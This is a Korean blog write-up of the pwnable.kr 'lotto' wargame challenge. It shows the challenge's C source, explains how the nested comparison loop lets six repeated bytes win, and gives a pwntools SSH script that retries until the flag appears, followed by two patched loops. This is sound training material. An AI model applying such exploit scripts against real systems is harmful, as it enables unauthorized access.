일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- lord of sql injection
- htmlspecialchars
- object
- 조건문
- 함수
- jQuery
- document
- 배열
- xss game 풀이
- element 조회
- suninatas 풀이
- 포인터
- 파이썬
- IF문
- Pwndbg
- property
- burp suite
- 사칙연산
- 객체
- 자바스크립트
- window
- xss game
- python
- blind sql injection
- 백준 알고리즘
- sql injection
- 메소드
- 백준 파이썬
- github
- 김성엽 대표님
- Today
- Total
power-girl0-0
[pwnable] lotto 풀이 본문
어서 오세요~~ (@^0^@)/
1. 문제
SSH로 접속해서, 확인해보면 lotto 실행파일과 C 코드가 존재한다.
해당 문제는 lotto게임 컨셉으로, 사용자가 입력한 값 6개와 랜덤 한 값 6개가 맞을 때 flag를 출력해준다.
2. 코드
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
unsigned char submit[6];
void play(){
int i;
printf("Submit your 6 lotto bytes : ");
fflush(stdout);
int r;
r = read(0, submit, 6);
printf("Lotto Start!\n");
//sleep(1);
// generate lotto numbers
int fd = open("/dev/urandom", O_RDONLY);
if(fd==-1){
printf("error. tell admin\n");
exit(-1);
}
unsigned char lotto[6];
if(read(fd, lotto, 6) != 6){
printf("error2. tell admin\n");
exit(-1);
}
for(i=0; i<6; i++){
lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45
}
close(fd);
// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}
// win!
if(match == 6){
system("/bin/cat flag");
}
else{
printf("bad luck...\n");
}
}
void help(){
printf("- nLotto Rule -\n");
printf("nlotto is consisted with 6 random natural numbers less than 46\n");
printf("your goal is to match lotto numbers as many as you can\n");
printf("if you win lottery for *1st place*, you will get reward\n");
printf("for more details, follow the link below\n");
printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
printf("mathematical chance to win this game is known to be 1/8145060.\n");
}
int main(int argc, char* argv[]){
// menu
unsigned int menu;
while(1){
printf("- Select Menu -\n");
printf("1. Play Lotto\n");
printf("2. Help\n");
printf("3. Exit\n");
scanf("%d", &menu);
switch(menu){
case 1:
play();
break;
case 2:
help();
break;
case 3:
printf("bye\n");
return 0;
default:
printf("invalid menu\n");
break;
}
}
return 0;
}
3. 코드 분석
코드를 살펴보면 랜덤값과 입력값을 비교해서 6글자가 맞으면, flag를 얻을 수 있다.
랜덤 값을 알 수 없기 때문에 urandom함수를 제외 후 남은 코드를 살펴보았다.
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}
// win!
if(match == 6){
system("/bin/cat flag");
}
else{
printf("bad luck...\n");
}
match값이 6이 되면, flag를 확인할 수 있다.
그전에, 이중 for문 부분에서 문제점을 확인할 수 있다.
' lotto[i] == submit[j] ' 조건에 맞으면 match의 값이 +1이 되는데, 이후에 for문이 끝나지 않고 6번 반복하게 된다.
즉, 랜덤한 값이 lotto의 한 글자만 맞아도 match값을 6으로 만들 수 있다는 의미이다.
한 가지 더 유의할 것은 입력받아온 값과 랜덤 값이 저장된 배열의 자료형이 char라는 것이다.
즉, 랜덤한 값의 범위인 1~45를 char로 변형시켜 입력해야 하는 것이다.
4. 풀이
코드 분석을 통해, flag를 구하기 위해서 2가지 조건을 정리할 수 있다.
1. 입력값은 랜덤한 값의 범위인 1 ~ 45를 char자료형으로 입력해야한다. 2. 입력값은 char자료형으로 해야하며, 6글자가 다 똑같아야 한다. -> 두번째 for문에서 i는 그대로지만 j는 값이 바뀌기 때문에, if조건문의 True가 되려면 입력하는 6글자가 똑같아야 한다. |
조건 1을 만족시키기 위해, python을 이용해서 1~45를 char자료형으로 바꿔보았다.
가장 첫번째에 있는 !를 입력해서, 풀어보자!
언제 랜덤값으로 33이 나올지 모르니, flag가 출력될 때까지 !(느낌표) 6개를 입력해보았다.
그 결과, flag를 얻을 수 있었다.
5. pwntools를 이용해서, flag획득
from pwn import *
PORT = 2222
USER = "lotto"
HOST = "pwnable.kr"
PASSWD = "guest"
p = ssh(user = USER, host=HOST, password=PASSWD, port = PORT)
p1 = p.process("./lotto")
print (p1.recv())
num = 0
while True:
sleep(2)
num+=1
print("\n==[", num,"]=============" )
p1.sendline("1")
print (p1.recv())
p1.sendline("!!!!!!")
p1.recvuntil("Lotto Start!\n")
ans = p1.recvline()
print(ans)
if b'bad luck' not in ans :
break
6. 보안패치
두가지 방식으로 생각해보았다.
① 랜덤값과 입력값의 6글자가 값만 똑같으면 되는 경우
: 이중 for문을 하지 않아도 된다.
int match = 0;
for(i=0; i<6; i++){
if(lotto[i] == submit[i]){
match++;
}
② 랜덤값과 입력값의 6글자가 값과 위치가 똑같아야 하는 경우
: break를 넣어줘야 한다.
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
break;
}
}
}
안녕히가십쇼! ^^7
'War game > pwnable.kr' 카테고리의 다른 글
[pwnable] uaf 풀이 (1) | 2022.03.21 |
---|---|
[pwnable] blackjack 풀이 (0) | 2022.03.16 |
[pwnable] coin1 풀이 (0) | 2022.03.11 |
[pwnable] cmd2 풀이 (0) | 2022.02.21 |
[pwnable] cmd1 풀이 (0) | 2022.02.20 |